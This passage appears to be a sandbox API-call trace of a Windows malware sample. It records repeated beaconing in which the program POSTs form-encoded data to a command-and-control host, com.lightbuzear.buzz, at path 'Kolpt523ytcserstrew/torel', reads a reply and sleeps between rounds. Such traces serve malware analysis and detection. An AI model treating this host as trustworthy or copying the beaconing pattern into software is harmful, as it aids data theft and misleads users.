hHeap=0x4780000) returned 1 [0293.659] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0293.659] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0293.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3e8 | out: hHeap=0x4780000) returned 1 [0293.659] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0293.660] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0293.660] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0293.660] FreeLibrary (hLibModule=0x71570000) returned 1 [0293.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0293.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0293.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0293.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be7d0 | out: hHeap=0x4780000) returned 1 [0293.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be370 | out: hHeap=0x4780000) returned 1 [0293.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0293.661] Sleep (dwMilliseconds=0x2710) [0293.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0293.673] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0293.673] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0293.673] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0293.673] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0293.673] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0293.688] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0293.688] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0293.688] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0293.688] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebd0 [0293.688] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0293.688] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eae0 [0293.688] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebd0 | out: hHeap=0x4780000) returned 1 [0293.688] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0293.688] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0293.688] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ed08 [0293.688] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0293.689] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0293.689] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0293.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0293.689] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0293.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec60 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eae0 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec60 | out: hHeap=0x4780000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be5a0 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0293.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0293.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be370 [0293.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0293.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be668 [0293.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0293.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0293.692] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0293.692] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0293.692] FreeLibrary (hLibModule=0x71780000) returned 1 [0293.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be668 | out: hHeap=0x4780000) returned 1 [0293.692] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0293.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be6e0 [0293.692] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0293.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0293.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0293.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0293.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0293.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0293.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0293.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0293.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0293.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0293.693] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec30 [0293.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0293.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecf0 [0293.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0293.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0293.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0293.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ec30 [0293.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0293.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0293.694] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0293.694] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0293.694] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3e8 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0293.695] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0293.695] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0293.695] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0293.695] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eaf8 [0293.695] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eae0 [0293.695] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eaf8 | out: hHeap=0x4780000) returned 1 [0293.695] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0293.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0293.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eb40 [0293.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5f0 [0293.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5f0 | out: hHeap=0x4780000) returned 1 [0293.696] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0293.696] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0293.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0293.696] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebb8 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be7d0 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0293.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be7d0 | out: hHeap=0x4780000) returned 1 [0293.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be7d0 [0293.698] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0293.698] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5f0 [0293.698] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0293.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0293.721] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0293.721] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0293.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5f0 | out: hHeap=0x4780000) returned 1 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0293.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0293.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0293.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0293.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0293.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebb8 [0293.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0293.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0293.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be5f0 [0293.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0293.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0293.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5f0 | out: hHeap=0x4780000) returned 1 [0293.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be6b8 [0293.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0293.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5f0 [0293.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0293.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0293.724] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0293.724] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0295.084] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5f0 | out: hHeap=0x4780000) returned 1 [0295.084] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0295.085] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0295.085] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0295.085] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0295.085] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0295.085] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0295.085] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0295.085] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0295.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0295.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebb8 [0295.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecf0 [0295.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0295.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be5f0 [0295.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0295.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5f0 | out: hHeap=0x4780000) returned 1 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5f0 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0295.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be618 [0295.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0295.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0295.087] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0295.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0295.088] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be618 | out: hHeap=0x4780000) returned 1 [0295.088] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0295.088] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0295.088] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0295.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0295.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0295.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0295.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0295.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0295.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0295.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0295.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ecf0 [0295.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0295.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed20 [0295.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0295.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0295.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0295.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be618 [0295.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0295.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0295.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be618 | out: hHeap=0x4780000) returned 1 [0295.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be618 [0295.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0295.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be640 [0295.120] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0295.121] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0295.121] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0295.121] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0295.122] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0295.122] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0295.122] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0295.122] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0295.122] FreeLibrary (hLibModule=0x71570000) returned 1 [0295.122] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0295.122] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0295.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3e8 | out: hHeap=0x4780000) returned 1 [0295.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0295.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be6e0 | out: hHeap=0x4780000) returned 1 [0295.124] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0295.124] Sleep (dwMilliseconds=0x2710) [0295.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0295.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0295.141] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0295.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0295.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0295.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0295.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0295.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0295.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0295.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eae0 [0295.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0295.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb58 